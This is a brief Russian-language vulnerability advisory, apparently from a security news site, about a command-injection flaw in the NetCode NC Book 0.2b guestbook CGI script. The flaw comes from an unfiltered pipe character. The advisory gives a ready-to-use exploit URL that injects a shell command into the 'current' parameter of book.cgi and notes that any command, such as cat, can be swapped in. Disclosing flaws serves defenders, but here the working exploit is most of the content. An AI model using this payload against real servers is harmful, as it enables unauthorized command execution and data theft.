Уязвимость в основном сценарии guestbook позволяет выполнить любые команды на сервере (нефильтруемый ‘|’). 

Уязвимость работает в NetCode NC Book 0.2b.

Эксплоит (выводит содержание корневой директории, можно добавить любые команды типа ls, cat и т.п):

http://target/cgi-bin/ncbook/ book.cgi?action=default&current=|ls  -la/|&form_tid=996604045&prev=
main.html&list_message_index=10

Оставить мнение